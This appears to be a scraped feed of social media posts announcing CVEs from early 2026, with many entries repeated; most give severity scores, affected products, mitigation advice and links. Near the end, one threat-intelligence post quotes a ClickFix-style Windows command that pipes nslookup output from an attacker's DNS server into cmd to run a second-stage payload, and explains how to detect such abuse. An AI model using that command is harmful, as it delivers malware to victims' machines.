🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15578/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:41
3 posts
🟠 CVE-2026-2447 - High (8.8)
Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, Firefox ESR < 115.32.1, Thunderbird < 140.7.2, and Thunderbird < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2447/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2447 - High (8.8)
Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, Firefox ESR < 115.32.1, Thunderbird < 140.7.2, and Thunderbird < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2447/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:16:24.717000
2 posts
🟠 CVE-2026-2616 - High (8.8)
A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2616 - High (8.8)
A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:16:23.760000
4 posts
🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:16:23.420000
6 posts
⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. https://radar.offseq.com/threat/cve-2026-2439-cwe-340-generation-of-predictable-nu-8847b5d6 #OffSeq #CVE20262439 #infosec #vuln
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. https://radar.offseq.com/threat/cve-2026-2439-cwe-340-generation-of-predictable-nu-8847b5d6 #OffSeq #CVE20262439 #infosec #vuln
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:16:18.877000
2 posts
🔴 CVE-2025-69633 - Critical (9.8)
A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69633/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-69633 - Critical (9.8)
A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69633/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T13:40:10.320000
1 posts
3 repos
https://github.com/cybrdude/cve-2026-1731-scanner
Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-17T12:31:18
2 posts
CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##updated 2026-02-17T12:31:13
2 posts
🟠 CVE-2025-7631 - High (8.6)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7631/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-7631 - High (8.6)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7631/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T12:31:13
2 posts
🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903
##🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903
##updated 2026-02-17T05:16:17.430000
2 posts
1 repos
🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: https://radar.offseq.com/threat/cve-2026-2592-cwe-284-improper-access-control-in-z-22959dc1 #OffSeq #WooCommerce #WordPress
##🟠 CVE-2026-2592 - High (7.7)
The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2592/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T03:30:16
1 posts
⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! https://radar.offseq.com/threat/cve-2026-26220-cwe-502-deserialization-of-untruste-3d57a118 #OffSeq #infosec #CVE202626220 #rce
##updated 2026-02-17T00:30:19
1 posts
🟠 CVE-2025-12062 - High (8.8)
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-16T17:18:09.150000
1 posts
1 repos
🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. https://radar.offseq.com/threat/cve-2026-2564-weak-password-recovery-in-intelbras--15b4ad92 #OffSeq #CVE20262564 #IoTSecurity
##updated 2026-02-16T15:32:54
1 posts
CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! https://radar.offseq.com/threat/cve-2026-1333-cwe-457-use-of-uninitialized-variabl-1f2a1adb #OffSeq #vuln #SOLIDWORKS #infosec
##updated 2026-02-16T15:32:54
1 posts
🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-16T14:16:18.160000
1 posts
⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. https://radar.offseq.com/threat/cve-2026-1334-cwe-125-out-of-bounds-read-in-dassau-5f48827a #OffSeq #SOLIDWORKS #Infosec
##updated 2026-02-16T12:32:02
1 posts
⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. https://radar.offseq.com/threat/cve-2026-2451-cwe-627-dynamic-variable-evaluation--3e2879f1 #OffSeq #Vulnerability #pretix #InfoSec
##updated 2026-02-16T12:32:01
1 posts
🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: https://radar.offseq.com/threat/cve-2026-2452-cwe-627-dynamic-variable-evaluation--1e0b8836 #OffSeq #Vuln #pretix #Infosec
##updated 2026-02-15T18:30:25
1 posts
🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T11:15:54.307000
1 posts
🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T04:15:53.783000
3 posts
1 repos
Critical Vulnerability in CleanTalk WordPress Plugin Puts 200,000 Sites at Risk
A recently discovered critical vulnerability (CVE-2026-1490, CVSS 9.8) in the CleanTalk WordPress plugin, affecting versions up to 6.71, has raised alarms for the cybersecurity community. This flaw exposes over 200,000 websites to severe threats, allowing unauthenticated attackers to exploit the vulnerability. The attackers could potentially install malicious plugins and execute remote code…
##Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing
A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.
**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cleantalk-plugin-vulnerability-allows-wordpress-site-takeover-via-dns-spoofing-v-h-r-b-n/gD2P6Ple2L
🔴 CVE-2026-1490 - Critical (9.8)
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-13T14:04:05.243000
2 posts
3 repos
Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen
Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm
#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump
##Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen
Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm
#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump
##updated 2026-02-12T15:11:02.290000
2 posts
Why isn't anyone talking about this PostgreSQL vulnerability? https://nvd.nist.gov/vuln/detail/cve-2026-2360
Did y'all talk about it last week without me?
##Why isn't anyone talking about this PostgreSQL vulnerability? https://nvd.nist.gov/vuln/detail/cve-2026-2360
Did y'all talk about it last week without me?
##updated 2026-02-11T15:38:13.670000
1 posts
updated 2026-02-10T21:31:29
1 posts
1 repos
updated 2026-02-09T09:30:28
1 posts
🚨 New security advisory:
CVE-2026-22903 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-22903
updated 2026-02-09T09:30:28
1 posts
🚨 New security advisory:
CVE-2026-1868 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-1868
updated 2026-01-20T16:16:06.200000
2 posts
4 repos
https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner
https://github.com/horizon3ai/CVE-2025-64155
CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##updated 2026-01-13T18:31:18
2 posts
CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##updated 2026-01-13T18:31:14
2 posts
Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##updated 2025-10-23T01:00:00.913000
1 posts
1 repos
cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.
Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.
When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.
#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft
##